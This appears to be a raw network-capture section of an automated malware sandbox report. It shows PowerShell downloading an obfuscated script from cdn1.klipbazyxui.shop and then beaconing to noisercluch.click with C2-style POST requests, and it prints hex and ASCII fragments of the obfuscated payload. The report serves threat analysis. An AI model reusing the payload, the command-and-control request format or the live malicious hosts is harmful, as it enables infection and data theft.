Dec 30, 2024 19:17:52.890525103 CET	49989	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:52.890537977 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:53.525042057 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:53.525127888 CET	49989	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:53.526686907 CET	49989	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:53.526699066 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:53.526963949 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:53.528163910 CET	49989	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:53.528186083 CET	49989	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:53.528254032 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:53.996629953 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:53.996680975 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:53.996716022 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:53.996743917 CET	49989	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:53.996747971 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:53.996777058 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:53.996794939 CET	49989	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:53.997199059 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:53.997226954 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:53.997248888 CET	49989	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:53.997258902 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:53.997303963 CET	49989	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:53.998205900 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:54.001677036 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:54.001712084 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:54.001724958 CET	49989	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:54.001741886 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:54.001784086 CET	49989	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:54.001790047 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:54.001827955 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:54.001869917 CET	49989	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:54.002115011 CET	49989	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:54.002132893 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:54.002142906 CET	49989	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:54.002146959 CET	443	49989	188.114.96.3	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 19:15:08.472687006 CET	51388	53	192.168.2.5	1.1.1.1
Dec 30, 2024 19:15:08.486841917 CET	53	51388	1.1.1.1	192.168.2.5
Dec 30, 2024 19:16:27.309940100 CET	62294	53	192.168.2.5	1.1.1.1
Dec 30, 2024 19:16:27.322910070 CET	53	62294	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 30, 2024 19:15:08.472687006 CET	192.168.2.5	1.1.1.1	0xadf	Standard query (0)	cdn1.klipbazyxui.shop	A (IP address)	IN (0x0001)	false
Dec 30, 2024 19:16:27.309940100 CET	192.168.2.5	1.1.1.1	0x3a56	Standard query (0)	noisercluch.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 30, 2024 19:15:08.486841917 CET	1.1.1.1	192.168.2.5	0xadf	No error (0)	cdn1.klipbazyxui.shop	172.67.154.95	A (IP address)	IN (0x0001)	false
Dec 30, 2024 19:15:08.486841917 CET	1.1.1.1	192.168.2.5	0xadf	No error (0)	cdn1.klipbazyxui.shop	104.21.72.190	A (IP address)	IN (0x0001)	false
Dec 30, 2024 19:16:27.322910070 CET	1.1.1.1	192.168.2.5	0x3a56	No error (0)	noisercluch.click	188.114.96.3	A (IP address)	IN (0x0001)	false
Dec 30, 2024 19:16:27.322910070 CET	1.1.1.1	192.168.2.5	0x3a56	No error (0)	noisercluch.click	188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cdn1.klipbazyxui.shop

noisercluch.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	172.67.154.95	443	3784	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 18:15:09 UTC	80	OUT	GET /web44.dle HTTP/1.1 Host: cdn1.klipbazyxui.shop Connection: Keep-Alive
2024-12-30 18:15:09 UTC	996	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 18:15:09 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 8290530 Connection: close X-Powered-By: Express ETag: W/"7e80e2-kQOdKNbUt9nEtWyhOlt0DA5M/Z8" Set-Cookie: connect.sid=s%3Ax3LXUKjC_uaDIyJxEJ7_COLpZB39bjkS.EfF9%2FVxaqVW3a91MTKKVQt4oKlo3chO%2BRe4%2FRhnZX1M; Path=/; HttpOnly cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cAnYz3juTwIIvge00n7aJI8dcoDK25lUndDdkvKVAyU7H99QPMBfY0RkjXKAE2FLEpSESK6Qt%2F27JJGn304JXzyCkSvOQXMyoQ%2FR%2BRt27y7o9lSYRkVju5zo8BLg%2BJNe%2BuGMBBYvpD0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa40379bb044369-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1792&rtt_var=672&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=694&delivery_rate=1628555&cwnd=234&unsent_bytes=0&cid=b6ba1157a8a7abf6&ts=486&x=0"
2024-12-30 18:15:09 UTC	373	IN	Data Raw: 0d 0a 24 79 64 4f 74 77 6b 46 68 20 3d 20 28 28 28 28 28 39 32 38 39 34 31 20 2a 20 2d 31 31 29 20 2b 20 28 28 28 28 31 31 32 38 35 20 2a 20 24 79 64 4f 74 77 6b 46 68 29 20 2b 20 37 31 36 33 36 36 29 20 2b 20 34 35 34 29 29 29 20 2a 20 2d 34 38 37 29 20 2d 20 32 37 33 31 29 20 2b 20 2d 38 38 29 0d 0a 24 52 72 48 56 77 4e 57 46 6b 70 52 20 3d 20 28 28 28 28 28 28 36 38 39 39 38 20 2a 20 28 28 28 28 28 28 34 31 30 37 30 39 20 2a 20 33 36 37 29 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 20 2a 20 24 79 64 4f 74 77 6b 46 68 29 20 2d 20 24 79 64 4f 74 77 6b 46 68 29 20 2d 20 35 39 29 29 29 20 2a 20 28 28 28 28 2d 39 20 2a 20 2d 31 29 20 2d 20 32 36 34 34 35 29 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 29 29 20 2d 20 24 52 72 48 56 77 4e 57 46 6b 70 Data Ascii: $ydOtwkFh = (((((928941 * -11) + ((((11285 * $ydOtwkFh) + 716366) + 454))) * -487) - 2731) + -88)$RrHVwNWFkpR = ((((((68998 * ((((((410709 * 367) + $RrHVwNWFkpR) * $ydOtwkFh) - $ydOtwkFh) - 59))) * ((((-9 * -1) - 26445) + $RrHVwNWFkpR))) - $RrHVwNWFkp
2024-12-30 18:15:09 UTC	1369	IN	Data Raw: 70 20 2b 20 28 28 28 24 4d 6c 6a 77 4a 72 79 70 20 2d 20 2d 31 32 33 31 39 29 20 2d 20 24 79 64 4f 74 77 6b 46 68 29 29 29 20 2b 20 24 79 64 4f 74 77 6b 46 68 29 0d 0a 24 4b 76 48 6f 6a 56 52 4b 6f 20 3d 20 28 28 28 28 24 79 64 4f 74 77 6b 46 68 20 2b 20 39 38 30 29 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 20 2d 20 2d 35 31 35 33 31 29 20 2a 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 0d 0a 24 79 51 55 49 4d 48 68 57 20 3d 20 28 28 28 28 28 24 4d 6c 6a 77 4a 72 79 70 20 2b 20 24 79 64 4f 74 77 6b 46 68 29 20 2a 20 2d 31 38 33 29 20 2d 20 35 34 32 35 29 20 2b 20 2d 37 38 30 29 20 2a 20 24 79 51 55 49 4d 48 68 57 29 0d 0a 24 6c 4b 76 48 73 76 53 46 4b 68 20 3d 20 28 28 24 79 64 4f 74 77 6b 46 68 20 2d 20 28 28 28 28 28 28 24 6c 4b 76 48 73 76 53 46 4b Data Ascii: p + ((($MljwJryp - -12319) - $ydOtwkFh))) + $ydOtwkFh)$KvHojVRKo = (((($ydOtwkFh + 980) + $RrHVwNWFkpR) - -51531) * $RrHVwNWFkpR)$yQUIMHhW = ((((($MljwJryp + $ydOtwkFh) * -183) - 5425) + -780) * $yQUIMHhW)$lKvHsvSFKh = (($ydOtwkFh - (((((($lKvHsvSFK
2024-12-30 18:15:09 UTC	1369	IN	Data Raw: 39 36 38 29 20 2d 20 24 77 74 79 63 4a 42 51 4f 45 29 20 2d 20 24 66 6b 75 56 62 58 5a 6f 65 56 5a 29 20 2a 20 24 79 64 4f 74 77 6b 46 68 29 0d 0a 24 5a 6f 4d 77 7a 6f 20 3d 20 28 28 28 28 28 24 41 75 51 44 42 68 47 5a 4b 20 2a 20 28 28 28 36 37 35 31 36 38 20 2a 20 2d 39 32 29 20 2a 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 29 29 20 2a 20 28 28 28 28 2d 31 20 2b 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2a 20 2d 38 30 30 34 35 29 20 2b 20 24 79 51 55 49 4d 48 68 57 29 29 29 20 2a 20 35 32 36 34 34 34 29 20 2d 20 24 6a 5a 79 4a 78 78 41 6c 59 29 20 2d 20 35 38 32 37 32 29 0d 0a 24 7a 66 71 72 71 73 48 73 49 66 6d 20 3d 20 28 28 24 73 6f 65 4b 69 59 44 6b 71 65 59 20 2b 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2a 20 24 4b 76 48 6f 6a 56 52 4b 6f 29 0d 0a Data Ascii: 968) - $wtycJBQOE) - $fkuVbXZoeVZ) * $ydOtwkFh)$ZoMwzo = ((((($AuQDBhGZK * (((675168 * -92) * $RrHVwNWFkpR))) * ((((-1 + $lKvHsvSFKh) * -80045) + $yQUIMHhW))) * 526444) - $jZyJxxAlY) - 58272)$zfqrqsHsIfm = (($soeKiYDkqeY + $lKvHsvSFKh) * $KvHojVRKo)
2024-12-30 18:15:09 UTC	1369	IN	Data Raw: 6f 6a 56 52 4b 6f 20 2a 20 24 5a 63 69 55 6a 75 55 62 59 29 20 2b 20 24 67 67 4a 64 54 56 74 6e 70 43 29 29 29 20 2a 20 2d 37 39 34 30 37 29 20 2a 20 36 29 0d 0a 20 20 20 20 69 66 20 28 28 24 41 75 51 44 42 68 47 5a 4b 20 2d 6c 74 20 24 71 6f 46 70 4c 68 6e 66 29 20 2d 6f 72 20 28 24 52 72 48 56 77 4e 57 46 6b 70 52 20 2d 65 71 20 2d 33 32 35 32 29 20 2d 6f 72 20 28 38 20 2d 67 65 20 24 7a 66 71 72 71 73 48 73 49 66 6d 29 20 2d 6f 72 20 28 24 5a 63 69 55 6a 75 55 62 59 20 2d 67 74 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 6e 4e 73 4c 73 4c 62 53 47 20 3d 20 28 28 28 24 7a 66 71 72 71 73 48 73 49 66 6d 20 2b 20 2d 33 35 39 38 29 20 2b 20 28 28 28 24 6c 4b 76 48 73 76 53 46 4b 68 20 2d 20 24 73 6f 65 4b 69 59 44 6b 71 Data Ascii: ojVRKo * $ZciUjuUbY) + $ggJdTVtnpC))) * -79407) * 6) if (($AuQDBhGZK -lt $qoFpLhnf) -or ($RrHVwNWFkpR -eq -3252) -or (8 -ge $zfqrqsHsIfm) -or ($ZciUjuUbY -gt $lKvHsvSFKh)) { $nNsLsLbSG = ((($zfqrqsHsIfm + -3598) + ((($lKvHsvSFKh - $soeKiYDkq
2024-12-30 18:15:09 UTC	1369	IN	Data Raw: 7a 66 71 72 71 73 48 73 49 66 6d 29 29 0d 0a 20 20 20 20 69 66 20 28 28 34 36 20 2d 6c 65 20 24 73 6f 65 4b 69 59 44 6b 71 65 59 29 20 2d 61 6e 64 20 28 32 20 2d 6e 65 20 2d 32 29 20 2d 61 6e 64 20 28 24 67 67 4a 64 54 56 74 6e 70 43 20 2d 6c 65 20 24 41 6e 50 74 6e 43 4a 56 41 50 4a 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 67 48 66 64 72 4f 46 20 3d 20 28 28 28 28 28 28 28 2d 31 36 35 33 33 30 20 2d 20 24 7a 64 74 6d 50 43 49 64 6a 65 29 20 2a 20 28 28 28 28 2d 39 38 35 39 37 20 2d 20 24 71 6f 46 70 4c 68 6e 66 29 20 2a 20 33 38 37 39 30 29 20 2a 20 37 32 33 35 38 37 29 29 29 20 2b 20 2d 38 35 36 35 29 20 2b 20 28 28 28 28 24 56 41 58 70 51 68 20 2d 20 2d 37 34 34 32 35 29 20 2b 20 24 73 6f 65 4b 69 59 44 6b 71 65 59 29 20 2a 20 24 41 75 51 44 42 68 Data Ascii: zfqrqsHsIfm)) if ((46 -le $soeKiYDkqeY) -and (2 -ne -2) -and ($ggJdTVtnpC -le $AnPtnCJVAPJ)) { $gHfdrOF = (((((((-165330 - $zdtmPCIdje) * ((((-98597 - $qoFpLhnf) * 38790) * 723587))) + -8565) + (((($VAXpQh - -74425) + $soeKiYDkqeY) * $AuQDBh
2024-12-30 18:15:09 UTC	1369	IN	Data Raw: 29 20 2b 20 24 5a 63 69 55 6a 75 55 62 59 29 20 2b 20 31 38 29 20 2a 20 28 28 28 28 28 24 66 6b 75 56 62 58 5a 6f 65 56 5a 20 2d 20 2d 35 35 31 32 37 29 20 2d 20 28 28 28 28 28 28 24 7a 64 74 6d 50 43 49 64 6a 65 20 2b 20 2d 32 29 20 2b 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2d 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2b 20 24 4a 4f 44 52 52 75 29 20 2d 20 24 67 67 4a 64 54 56 74 6e 70 43 29 29 29 29 20 2a 20 28 28 28 28 2d 38 32 30 20 2d 20 33 38 34 39 29 20 2d 20 36 37 30 29 20 2b 20 2d 33 32 33 34 30 34 29 20 2b 20 31 30 29 29 29 29 29 29 20 2a 20 2d 37 32 33 33 29 20 2a 20 35 37 33 37 34 29 29 20 2b 20 28 28 36 30 20 2a 20 28 28 28 28 24 58 72 76 4b 6c 6a 20 2d 20 24 4a 4f 44 52 52 75 29 20 2a 20 24 5a 6f 4d 77 7a 6f 29 20 2d 20 37 29 29 29 20 2d Data Ascii: ) + $ZciUjuUbY) + 18) * ((((($fkuVbXZoeVZ - -55127) - (((((($zdtmPCIdje + -2) + $lKvHsvSFKh) - $lKvHsvSFKh) + $JODRRu) - $ggJdTVtnpC)))) * ((((-820 - 3849) - 670) + -323404) + 10)))))) * -7233) * 57374)) + ((60 * (((($XrvKlj - $JODRRu) * $ZoMwzo) - 7))) -
2024-12-30 18:15:09 UTC	1369	IN	Data Raw: 34 39 29 20 2a 20 24 5a 6f 4d 77 7a 6f 29 20 2b 20 24 67 67 4a 64 54 56 74 6e 70 43 29 20 2d 20 24 67 67 4a 64 54 56 74 6e 70 43 29 20 2b 20 2d 35 35 33 31 34 29 29 29 20 2a 20 32 37 30 29 0d 0a 20 20 20 20 24 67 59 65 52 44 68 62 52 4f 2d 2d 0d 0a 7d 0d 0a 69 66 20 28 28 36 34 36 39 20 2d 6c 74 20 24 7a 64 74 6d 50 43 49 64 6a 65 29 20 2d 6f 72 20 28 24 56 41 58 70 51 68 20 2d 6c 74 20 2d 31 32 39 29 29 20 7b 0d 0a 20 20 20 20 24 79 51 55 49 4d 48 68 57 20 3d 20 28 28 28 28 28 28 28 24 71 6f 46 70 4c 68 6e 66 20 2a 20 28 28 28 28 28 24 71 6f 46 70 4c 68 6e 66 20 2b 20 28 28 28 2d 31 32 36 34 33 32 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 20 2a 20 2d 35 31 35 39 30 33 29 29 29 20 2b 20 24 67 67 4a 64 54 56 74 6e 70 43 29 20 2d 20 24 6c 4b 76 48 73 Data Ascii: 49) * $ZoMwzo) + $ggJdTVtnpC) - $ggJdTVtnpC) + -55314))) * 270) $gYeRDhbRO--}if ((6469 -lt $zdtmPCIdje) -or ($VAXpQh -lt -129)) { $yQUIMHhW = ((((((($qoFpLhnf * ((((($qoFpLhnf + (((-126432 + $RrHVwNWFkpR) * -515903))) + $ggJdTVtnpC) - $lKvHs
2024-12-30 18:15:09 UTC	1369	IN	Data Raw: 24 73 6f 65 4b 69 59 44 6b 71 65 59 29 20 2b 20 24 76 76 6b 45 44 50 61 62 29 20 2d 20 24 56 41 58 70 51 68 29 20 2b 20 28 28 28 28 28 28 35 37 34 20 2b 20 24 67 67 4a 64 54 56 74 6e 70 43 29 20 2a 20 24 4c 46 7a 68 4e 6f 62 6a 5a 29 20 2d 20 33 38 31 29 20 2d 20 24 79 64 4f 74 77 6b 46 68 29 20 2a 20 2d 32 34 39 36 37 38 29 29 29 20 2d 20 2d 36 29 29 0d 0a 7d 0d 0a 24 51 4e 54 5a 43 42 20 3d 20 36 0d 0a 77 68 69 6c 65 20 28 24 51 4e 54 5a 43 42 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 69 66 20 28 28 24 52 72 48 56 77 4e 57 46 6b 70 52 20 2d 6c 74 20 31 30 33 29 20 2d 61 6e 64 20 28 24 77 74 79 63 4a 42 51 4f 45 20 2d 6c 65 20 2d 35 31 37 35 37 38 29 20 2d 61 6e 64 20 28 24 62 48 43 78 7a 43 5a 20 2d 6c 74 20 30 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 Data Ascii: $soeKiYDkqeY) + $vvkEDPab) - $VAXpQh) + ((((((574 + $ggJdTVtnpC) * $LFzhNobjZ) - 381) - $ydOtwkFh) * -249678))) - -6))}$QNTZCB = 6while ($QNTZCB -gt 0) { if (($RrHVwNWFkpR -lt 103) -and ($wtycJBQOE -le -517578) -and ($bHCxzCZ -lt 0)) {
2024-12-30 18:15:09 UTC	1369	IN	Data Raw: 6b 75 56 62 58 5a 6f 65 56 5a 20 3d 20 28 28 28 2d 35 37 39 20 2a 20 31 34 39 30 29 20 2b 20 2d 39 39 38 32 29 20 2b 20 2d 39 39 29 0d 0a 69 66 20 28 28 2d 37 39 30 20 2d 6c 74 20 24 77 74 79 63 4a 42 51 4f 45 29 20 2d 61 6e 64 20 28 24 56 41 58 70 51 68 20 2d 6e 65 20 24 4a 4f 44 52 52 75 29 20 2d 61 6e 64 20 28 24 5a 6f 4d 77 7a 6f 20 2d 65 71 20 24 7a 66 71 72 71 73 48 73 49 66 6d 29 29 20 7b 0d 0a 20 20 20 20 24 4a 4f 44 52 52 75 20 3d 20 28 28 28 28 28 24 58 72 76 4b 6c 6a 20 2d 20 28 28 28 28 28 28 24 5a 63 69 55 6a 75 55 62 59 20 2d 20 2d 36 39 34 36 29 20 2b 20 24 58 72 76 4b 6c 6a 29 20 2a 20 28 28 28 28 28 28 2d 33 38 32 20 2b 20 36 30 31 30 29 20 2a 20 2d 34 29 20 2d 20 33 37 29 20 2a 20 39 39 37 31 29 20 2d 20 24 56 41 58 70 51 68 29 29 29 29 Data Ascii: kuVbXZoeVZ = (((-579 * 1490) + -9982) + -99)if ((-790 -lt $wtycJBQOE) -and ($VAXpQh -ne $JODRRu) -and ($ZoMwzo -eq $zfqrqsHsIfm)) { $JODRRu = ((((($XrvKlj - (((((($ZciUjuUbY - -6946) + $XrvKlj) * ((((((-382 + 6010) * -4) - 37) * 9971) - $VAXpQh))))
2024-12-30 18:15:09 UTC	1187	IN	Data Raw: 20 28 24 53 63 6a 77 5a 57 47 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 24 79 51 55 49 4d 48 68 57 20 3d 20 28 28 28 28 28 24 7a 64 74 6d 50 43 49 64 6a 65 20 2d 20 24 66 6b 75 56 62 58 5a 6f 65 56 5a 29 20 2a 20 28 28 28 28 28 24 52 72 48 56 77 4e 57 46 6b 70 52 20 2a 20 2d 38 29 20 2d 20 38 31 35 33 29 20 2a 20 24 4d 6c 6a 77 4a 72 79 70 29 20 2a 20 24 79 49 70 65 6d 75 4f 63 66 29 29 29 20 2a 20 28 28 28 28 24 6c 4b 76 48 73 76 53 46 4b 68 20 2a 20 2d 38 35 38 29 20 2a 20 2d 34 35 29 20 2a 20 24 76 76 6b 45 44 50 61 62 29 29 29 29 20 2b 20 28 28 28 24 76 76 6b 45 44 50 61 62 20 2d 20 24 79 51 55 49 4d 48 68 57 29 20 2b 20 24 5a 6f 4d 77 7a 6f 29 20 2a 20 2d 34 38 32 39 34 39 29 29 0d 0a 20 20 20 20 24 79 51 55 49 4d 48 68 57 20 3d 20 28 28 28 28 24 Data Ascii: ($ScjwZWG -gt 0) { $yQUIMHhW = ((((($zdtmPCIdje - $fkuVbXZoeVZ) * ((((($RrHVwNWFkpR * -8) - 8153) * $MljwJryp) * $yIpemuOcf))) * (((($lKvHsvSFKh * -858) * -45) * $vvkEDPab)))) + ((($vvkEDPab - $yQUIMHhW) + $ZoMwzo) * -482949)) $yQUIMHhW = (((($

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49982	188.114.96.3	443	2292	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 18:16:27 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: noisercluch.click
2024-12-30 18:16:27 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-30 18:16:28 UTC	1133	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 18:16:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3feejjm8kd7qipist4d45sj8c4; expires=Fri, 25 Apr 2025 12:03:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3t1ZZR5D%2Bq%2FN3v82Nr2qv8B6n9GBDZ8biz9XhrSwQd2CtU3Y%2BOEu3aTEfrpk%2FQIJxuUdzbnAWQMFIAfh8tMYC5K2bUmf2bWjweOrHzGx9Hzl4JirqO1vLbibc7JuMFf7e%2Fr4ww%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa405666ff80fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1521&rtt_var=581&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1868202&cwnd=252&unsent_bytes=0&cid=73c373735718479b&ts=510&x=0"
2024-12-30 18:16:28 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-30 18:16:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49983	188.114.96.3	443	2292	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 18:16:28 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: noisercluch.click
2024-12-30 18:16:28 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 57 47 36 49 36 53 2d 2d 77 65 62 34 34 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=WG6I6S--web44&j=
2024-12-30 18:16:29 UTC	1129	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 18:16:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0vt6ht3ni3ojs3m15csv35vakr; expires=Fri, 25 Apr 2025 12:03:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Njn3nT5OzkG6azn5PZOuGOBHV4raAOGY%2FGdQGepfdY8AOCwT%2BMM5GnsPI7i0LIwV1uP7Kztr23NcH5yOyL%2BkoWPgTKKl6M0SNFtqVgj%2BtSk3dklY4HQp3mOFN7Ai8jiutXVdA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4056cccc10f95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1506&min_rtt=1506&rtt_var=753&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4220&recv_bytes=948&delivery_rate=64471&cwnd=169&unsent_bytes=0&cid=ae09b6fced6bd69c&ts=502&x=0"
2024-12-30 18:16:29 UTC	240	IN	Data Raw: 34 39 39 34 0d 0a 4a 68 57 78 4b 6d 48 38 51 79 4f 50 70 4d 6f 4d 72 35 56 54 56 66 4e 66 57 73 4d 58 78 6d 43 79 39 5a 64 38 59 6e 4a 52 4d 35 70 64 4e 38 63 49 57 38 68 76 41 66 7a 42 36 44 62 62 35 79 59 77 33 33 30 37 70 7a 58 38 42 74 4f 5a 35 42 6c 4f 55 43 64 65 75 42 78 7a 30 45 59 53 6d 57 38 42 36 74 7a 6f 4e 76 54 75 63 54 43 64 66 57 44 68 63 71 77 43 30 35 6e 31 48 51 6b 64 49 56 2f 35 54 6e 6e 57 51 67 53 66 4a 30 4c 6a 79 61 39 70 79 76 51 35 4f 35 6f 79 4d 71 34 31 36 6b 4c 58 6a 37 56 47 51 44 38 30 52 2f 74 72 64 4d 4a 42 51 34 46 76 57 4b 33 42 70 43 36 56 74 7a 49 77 6b 54 4d 38 70 33 79 75 43 4e 71 52 39 42 67 49 41 6a 68 56 38 6b 35 33 31 55 4d 4f 6c 6a 4e 50 36 63 36 6b 62 38 44 30 63 58 Data Ascii: 4994JhWxKmH8QyOPpMoMr5VTVfNfWsMXxmCy9Zd8YnJRM5pdN8cIW8hvAfzB6Dbb5yYw3307pzX8BtOZ5BlOUCdeuBxz0EYSmW8B6tzoNvTucTCdfWDhcqwC05n1HQkdIV/5TnnWQgSfJ0Ljya9pyvQ5O5oyMq416kLXj7VGQD80R/trdMJBQ4FvWK3BpC6VtzIwkTM8p3yuCNqR9BgIAjhV8k531UMOljNP6c6kb8D0cX
2024-12-30 18:16:29 UTC	1369	IN	Data Raw: 6e 52 4f 69 44 68 4c 65 52 52 34 70 54 6b 44 78 55 64 49 31 65 34 57 7a 6e 4b 43 41 53 53 59 52 6d 74 7a 71 52 67 79 50 51 2b 4d 4a 41 39 4b 71 35 31 70 77 72 59 6b 2f 38 52 44 78 38 39 57 2f 39 4d 66 74 52 48 42 4a 59 6e 54 75 36 47 35 69 37 4b 37 33 46 76 30 52 30 6f 6f 6e 61 77 44 38 48 58 36 6c 41 5a 55 44 52 64 75 42 77 33 31 55 59 43 6b 79 46 54 35 63 32 6a 61 39 2f 38 4f 44 71 63 50 54 57 72 65 71 63 43 31 35 33 2f 45 51 6f 55 50 6c 7a 2b 52 48 65 54 42 6b 4f 5a 4f 51 47 31 68 6f 74 72 33 66 41 39 49 64 4d 48 65 4c 34 37 76 55 4c 58 6d 37 56 47 51 42 67 32 55 76 74 50 65 4e 42 41 43 49 77 68 55 2b 76 4c 72 58 7a 4c 38 6a 38 39 6b 69 38 79 72 33 4f 6e 43 39 75 65 38 42 6b 45 55 48 30 52 2f 31 77 33 69 77 67 69 6b 79 70 4e 35 39 47 6f 4c 74 4b 35 4b Data 